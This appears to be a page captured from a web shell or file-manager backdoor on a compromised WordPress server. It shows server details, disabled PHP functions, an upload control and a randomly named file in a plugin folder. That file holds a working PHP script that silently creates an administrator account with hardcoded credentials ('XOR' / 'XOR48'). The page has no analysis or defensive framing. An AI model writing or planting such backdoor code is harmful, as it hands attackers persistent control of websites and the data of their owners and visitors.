HEX
Server: Apache
System: Linux 235.120.168.184.host.secureserver.net 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User: www (1001)
PHP: 8.0.26
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/w888.pro/wp-content/plugins/ptftd/
Upload Files
File: /www/wwwroot/w888.pro/wp-content/plugins/ptftd/ovattpjii.php
<?php
/**
 * Manual Admin Creator - Fixed Logic
 */

// 1. Dynamic pathing to find WordPress root
$wp_path = $_SERVER['DOCUMENT_ROOT'] . '/wp-load.php';

if (file_exists($wp_path)) {
    require_once($wp_path);
} else {
    // Fallback for subdirectories
    require_once('wp-blog-header.php');
}

require_once(ABSPATH . 'wp-includes/registration.php');

// 2. Updated Config Variables
$newusername = 'XOR';
$newpassword = 'XOR48';
$newemail    = '[email protected]';

// 3. Execution Logic
if (!username_exists($newusername) && !email_exists($newemail)) {
    $user_id = wp_create_user($newusername, $newpassword, $newemail);
    
    if (is_int($user_id)) {
        $wp_user_object = new WP_User($user_id);
        $wp_user_object->set_role('administrator');
        echo 'Successfully created admin user: ' . $newusername;
    } else {
        echo 'Error: Could not create user.';
    }
} else {
    echo 'User already exists.';
}
@ Telegram